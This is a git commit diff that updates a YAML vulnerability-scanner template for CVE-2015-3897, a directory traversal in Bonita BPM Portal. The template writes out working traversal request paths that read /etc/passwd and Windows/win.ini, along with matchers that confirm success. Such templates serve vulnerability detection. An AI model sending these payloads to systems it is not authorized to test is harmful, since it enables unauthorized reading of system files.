Update and rename CVE-2015-3897.yaml to cves/2015/CVE-2015-3897.yaml

patch-1
Prince Chaddha 2022-04-10 00:31:56 +05:30 committed by GitHub
parent 74fce5e965
commit 7e6f810d1e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 7 deletions

View File

@ -6,26 +6,32 @@ info:
description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
reference: reference:
- https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
- https://www.bonitasoft.com/
- https://nvd.nist.gov/vuln/detail/CVE-2015-3897 - https://nvd.nist.gov/vuln/detail/CVE-2015-3897
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5 cvss-score: 7.5
cve-id: CVE-2015-3897 cve-id: CVE-2015-3897
cwe-id: CWE-22 cwe-id: CWE-22
tags: cve,cve2015,bonita,lfi tags: cve,cve2015,bonita,lfi,unauth
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd" - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd"
- "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"
matchers-condition: and stop-at-first-match: true
matchers-condition: or
matchers: matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
- type: regex - type: regex
regex: regex:
- "root:[x*]:0:0" - "root:[x*]:0:0:"
- type: status
status:
- 200